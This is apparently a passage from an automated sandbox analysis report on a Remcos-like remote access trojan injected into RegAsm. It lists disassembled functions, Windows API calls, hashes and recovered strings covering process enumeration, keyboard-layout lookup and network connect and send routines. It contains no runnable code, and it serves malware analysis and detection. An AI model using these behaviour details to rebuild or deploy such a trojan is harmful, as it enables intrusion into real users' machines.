                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                • CloseHandle.KERNEL32(?), ref: 00405140
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                • String ID: KeepAlive | Disabled
                                                • API String ID: 2993684571-305739064
                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                APIs
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                • String ID: Alarm triggered
                                                • API String ID: 614609389-2816303416
                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                Strings
                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                • API String ID: 3024135584-2418719853
                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                APIs
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                • _free.LIBCMT ref: 0044943D
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00449609
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                • String ID:
                                                • API String ID: 1286116820-0
                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                APIs
                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 2180151492-0
                                                • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                • __freea.LIBCMT ref: 0045129D
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID:
                                                • API String ID: 313313983-0
                                                • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                • _free.LIBCMT ref: 100071B8
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                • _free.LIBCMT ref: 0044F43F
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                • _free.LIBCMT ref: 10005BB4
                                                • _free.LIBCMT ref: 10005BDB
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                • _free.LIBCMT ref: 00448353
                                                • _free.LIBCMT ref: 0044837A
                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat
                                                • String ID:
                                                • API String ID: 493641738-0
                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                APIs
                                                • _free.LIBCMT ref: 100091D0
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 100091E2
                                                • _free.LIBCMT ref: 100091F4
                                                • _free.LIBCMT ref: 10009206
                                                • _free.LIBCMT ref: 10009218
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                APIs
                                                • _free.LIBCMT ref: 00450A54
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00450A66
                                                • _free.LIBCMT ref: 00450A78
                                                • _free.LIBCMT ref: 00450A8A
                                                • _free.LIBCMT ref: 00450A9C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                APIs
                                                • _free.LIBCMT ref: 1000536F
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 10005381
                                                • _free.LIBCMT ref: 10005394
                                                • _free.LIBCMT ref: 100053A5
                                                • _free.LIBCMT ref: 100053B6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                APIs
                                                • _free.LIBCMT ref: 00444106
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00444118
                                                • _free.LIBCMT ref: 0044412B
                                                • _free.LIBCMT ref: 0044413C
                                                • _free.LIBCMT ref: 0044414D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                APIs
                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                • _free.LIBCMT ref: 0044E8D5
                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                • String ID: *?$.
                                                • API String ID: 2812119850-3972193922
                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                APIs
                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00DA4958,00000010), ref: 004048E0
                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
